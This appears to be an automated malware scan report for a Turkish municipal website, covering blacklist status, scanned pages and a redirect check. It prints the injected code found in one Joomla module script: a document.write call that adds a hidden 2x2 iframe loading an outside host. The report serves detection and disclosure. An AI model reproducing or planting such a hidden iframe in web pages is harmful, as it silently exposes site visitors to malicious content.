Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=varto.bel.tr
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://varto.bel.tr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.varto.bel.tr/ | 200 OK Content-Length: 36762 Content-Type: text/html | clean |
http://www.varto.bel.tr/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://www.varto.bel.tr/modules/mod_lofarticlesslideshow/assets/mod_lofarticlesslideshow_jl15x.js | 200 OK Content-Length: 9594 Content-Type: application/javascript | clean |
http://www.varto.bel.tr/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 2794 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
window.addEvent("load",function(){$$('.gk_npro_mainwrap').each(function(c,i){var d=c.getProperty('id');var e=$(d);var f=e.hasClass('hover');var g=false;var h=$Gavick[d];if($E('.gk_npro_full_interface',e)&&$E('.gk_npro_full_scroll1',e)){var l=$E('.gk_npro_full_scroll1',e).getSize().size.x;var m=new Fx.Scroll($E('.gk_npro_full_scroll1',e),{duration:h['animation_speed'],wheelStops:false,wait:false});var n=$ES('.gk_npro_full_tablewrap',e);var o=0;var p=(c.hasClass('autoanim'))?true:false;var document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=249726></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=249726
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=249726>
http://www.varto.bel.tr/index.php | 200 OK Content-Length: 36771 Content-Type: text/html | clean |
http://www.varto.bel.tr/component/contact/1.html | 200 OK Content-Length: 21940 Content-Type: text/html | clean |
http://www.varto.bel.tr/component/search/ | 200 OK Content-Length: 22594 Content-Type: text/html | clean |
http://www.varto.bel.tr/ihale-ilanlari.html | 200 OK Content-Length: 21884 Content-Type: text/html | clean |
http://www.varto.bel.tr/yatirim-ve-projelerimiz.html | 200 OK Content-Length: 21861 Content-Type: text/html | clean |
http://www.varto.bel.tr/meclis-kararlari.html | 200 OK Content-Length: 21796 Content-Type: text/html | clean |
http://www.varto.bel.tr/sosyokulturel-etkinlikler.html | 200 OK Content-Length: 21922 Content-Type: text/html | clean |
http://www.varto.bel.tr/kamu-hizmet-standardi.html | 200 OK Content-Length: 20984 Content-Type: text/html | clean |
http://www.varto.bel.tr/etik-komisyonu.html | 200 OK Content-Length: 37466 Content-Type: text/html | clean |
http://www.varto.bel.tr/iletisim.html | 200 OK Content-Length: 23685 Content-Type: text/html | clean |
http://www.varto.bel.tr/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: varto.bel.tr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: varto.bel.tr
Referer: http://www.google.com/search?q=varto.bel.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.